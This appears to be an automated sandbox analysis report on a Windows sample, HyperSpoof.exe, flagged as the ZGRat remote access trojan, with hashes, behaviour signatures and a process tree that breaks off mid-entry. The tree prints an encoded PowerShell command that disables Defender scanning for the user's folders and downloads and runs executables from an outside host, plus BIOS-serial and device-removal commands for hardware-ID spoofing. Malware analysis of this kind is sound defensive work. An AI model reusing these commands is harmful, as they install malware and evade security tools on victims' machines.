Analysis

  • max time kernel
    1049s
  • max time network
    1052s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240412-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-04-2024 12:14

General

  • Target

    HyperSpoof.exe

  • Size

    172KB

  • MD5

    ca27199cf4415233d9297b430dcf9924

  • SHA1

    8b21031c8e4a1c5c89c5a70b293cf401b08cb5a4

  • SHA256

    71cf21d4e30ae98454b96a451083590210af75bf547df729f178c261a263ff1e

  • SHA512

    af5c81a1859a3786baff02aac13057f0261ac697209151ce6b8d39f37115d5a6bd471a9cd348d351382c0dd69a828628cf0b38c49f0b9c9ca498e3de539f16ac

  • SSDEEP

    1536:tZkNU8lY/Nz2M0SrbG8XbXUVF5486VQTGRhih2TKbWTwLpVD7ZTcXx:tZ8VA0mG8XbXw56xhi8TKJFA

Malware Config

Signatures

  • Detect ZGRat V1 2 IoCs
  • Process spawned unexpected child process 15 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Nirsoft 3 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Stops running service(s) 3 TTPs
  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Enumerates connected drives 3 TTPs 30 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Maps connected drives based on registry 3 TTPs 64 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 6 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 15 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 46 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: LoadsDriver 24 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe
    "C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe"
    1⤵
    • Checks computer location settings
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2432
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAeQB0ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaQB0AHoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdwBjAHIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAGwAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBIAHAAcwByAFMAcABvAG8AZgAuAGUAeABlACcALAAgADwAIwByAHYAZgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGQAcwBzACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHMAdwB6ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEgAcABzAHIAUwBwAG8AbwBmAC4AZQB4AGUAJwApACkAPAAjAHYAegB3ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwByAGUAbQBvAHQAZQAvAHMAcABoAHkAcABlAHIAUgB1AG4AdABpAG0AZQBkAGgAYwBwAFMAdgBjAC4AZQB4AGUAJwAsACAAPAAjAG4AZgBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAeQB3AGcAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcQBnAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwBwAGgAeQBwAGUAcgBSAHUAbgB0AGkAbQBlAGQAaABjAHAAUwB2AGMALgBlAHgAZQAnACkAKQA8ACMAdwBnAG0AIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBvAG8AawByAGUAYQBkAGkAbgBnADIAMAAyADQALgBuAGUAdAAvAG0ALwBjAG8AbgBoAG8AcwB0AHMAZgB0AC4AZQB4AGUAJwAsACAAPAAjAGcAYwB6ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAagB2AHEAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdABmAGEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYwBvAG4AaABvAHMAdABzAGYAdAAuAGUAeABlACcAKQApADwAIwBnAHgAZQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBhAGYAcwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAeQB3AHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcASABwAHMAcgBTAHAAbwBvAGYALgBlAHgAZQAnACkAPAAjAGgAaAB4ACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGcAZgB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB3AGUAcAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBzAHAAaAB5AHAAZQByAFIAdQBuAHQAaQBtAGUAZABoAGMAcABTAHYAYwAuAGUAeABlACcAKQA8ACMAeAB2AGwAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZwBkAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAZQB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGMAbwBuAGgAbwBzAHQAcwBmAHQALgBlAHgAZQAnACkAPAAjAGsAYwBwACMAPgA="
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3884
      • C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe
        "C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of WriteProcessMemory
        PID:5036
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 0G4H-HCRL
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:396
          • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
            C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 0G4H-HCRL
            5⤵
            • Executes dropped EXE
            PID:2532
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Disk.bat
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:5044
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4304
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk drive*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3668
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "C:\"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2304
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "D:\"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1928
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "E:\"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3396
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "F:\"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1844
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "G:\"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2952
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3532
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "disk"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3656
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk&*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4992
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SWD\WPDBUSENUM*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4524
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "USBSTOR*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4536
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SCSI\Disk*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Drops file in Windows directory
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4312
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "STORAGE*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Drops file in Windows directory
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2980
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2232
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3672
          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 25732HP-TRGT20679AB
            5⤵
            • Executes dropped EXE
            PID:4700
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4684
          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 225732HP-TRGT20679RV
            5⤵
            • Executes dropped EXE
            PID:1392
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2896
          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 825732HP-TRGT20679SG
            5⤵
            • Executes dropped EXE
            PID:4548
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
          4⤵
            PID:3932
            • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
              C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
              5⤵
              • Executes dropped EXE
              PID:3668
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
            4⤵
              PID:4940
              • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 525732HP-TRGT20679SL
                5⤵
                • Executes dropped EXE
                PID:4992
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
              4⤵
                PID:4504
                • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 425735HP-TRGT31427FA
                  5⤵
                  • Executes dropped EXE
                  PID:4600
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
                4⤵
                  PID:1744
                  • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                    C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 625739HP-TRGT9407FU
                    5⤵
                    • Executes dropped EXE
                    PID:2192
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
                  4⤵
                    PID:3600
                    • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                      C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 325739HP-TRGT9407DQ
                      5⤵
                      • Executes dropped EXE
                      PID:2536
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
                    4⤵
                      PID:5044
                      • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 725739HP-TRGT9407MST
                        5⤵
                        • Executes dropped EXE
                        PID:2580
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
                      4⤵
                        PID:5100
                        • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                          C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
                          5⤵
                          • Executes dropped EXE
                          PID:2208
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
                        4⤵
                          PID:4964
                          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 25758HP-TRGT8362AB
                            5⤵
                            • Executes dropped EXE
                            PID:5168
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
                          4⤵
                            PID:4076
                            • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                              C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 225755HP-TRGT30382RV
                              5⤵
                              • Executes dropped EXE
                              PID:5380
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
                            4⤵
                              PID:5056
                              • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 825758HP-TRGT8362SG
                                5⤵
                                • Executes dropped EXE
                                PID:672
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
                              4⤵
                                PID:1728
                                • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
                                  5⤵
                                  • Executes dropped EXE
                                  PID:4124
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
                                4⤵
                                  PID:3844
                                  • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                    C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 525758HP-TRGT8362SL
                                    5⤵
                                    • Executes dropped EXE
                                    PID:4504
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
                                  4⤵
                                    PID:5300
                                    • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                      C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 425758HP-TRGT8362FA
                                      5⤵
                                      • Executes dropped EXE
                                      PID:1744
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
                                    4⤵
                                      PID:5392
                                      • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 625758HP-TRGT8362FU
                                        5⤵
                                        • Executes dropped EXE
                                        PID:1528
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
                                      4⤵
                                        PID:5612
                                        • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                          C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 325758HP-TRGT8362DQ
                                          5⤵
                                          • Executes dropped EXE
                                          PID:4868
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
                                        4⤵
                                          PID:5692
                                          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 725758HP-TRGT8362MST
                                            5⤵
                                            • Executes dropped EXE
                                            PID:2768
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
                                          4⤵
                                            PID:5960
                                            • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                              C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
                                              5⤵
                                              • Executes dropped EXE
                                              PID:4788
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
                                            4⤵
                                              PID:5988
                                              • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 25775HP-TRGT29336AB
                                                5⤵
                                                • Executes dropped EXE
                                                PID:4224
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
                                              4⤵
                                                PID:6116
                                                • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 225775HP-TRGT29336RV
                                                  5⤵
                                                  • Executes dropped EXE
                                                  PID:1532
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
                                                4⤵
                                                  PID:6120
                                                  • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                    C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 825775HP-TRGT29336SG
                                                    5⤵
                                                    • Executes dropped EXE
                                                    PID:2260
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
                                                  4⤵
                                                    PID:5308
                                                    • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                      C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
                                                      5⤵
                                                      • Executes dropped EXE
                                                      PID:4504
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
                                                    4⤵
                                                      PID:5456
                                                      • C:\Windows\System32\Conhost.exe
                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        5⤵
                                                          PID:4124
                                                        • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                          C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 525775HP-TRGT29336SL
                                                          5⤵
                                                          • Executes dropped EXE
                                                          PID:3952
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
                                                        4⤵
                                                          PID:5584
                                                          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 425775HP-TRGT29336FA
                                                            5⤵
                                                            • Executes dropped EXE
                                                            PID:5388
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
                                                          4⤵
                                                            PID:5384
                                                            • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                              C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 625775HP-TRGT29336FU
                                                              5⤵
                                                              • Executes dropped EXE
                                                              PID:2228
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
                                                            4⤵
                                                              PID:3220
                                                              • C:\Windows\System32\Conhost.exe
                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                5⤵
                                                                  PID:5100
                                                                • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 325775HP-TRGT29336DQ
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  PID:5792
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
                                                                4⤵
                                                                  PID:5360
                                                                  • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                    C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 725775HP-TRGT29336MST
                                                                    5⤵
                                                                    • Executes dropped EXE
                                                                    PID:3536
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
                                                                  4⤵
                                                                    PID:3844
                                                                    • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                      C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
                                                                      5⤵
                                                                      • Executes dropped EXE
                                                                      PID:5568
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: 2KIN-5550
                                                                    4⤵
                                                                      PID:6132
                                                                      • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                        C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: 2KIN-5550
                                                                        5⤵
                                                                        • Executes dropped EXE
                                                                        PID:4412
                                                                    • C:\Windows\System32\cmd.exe
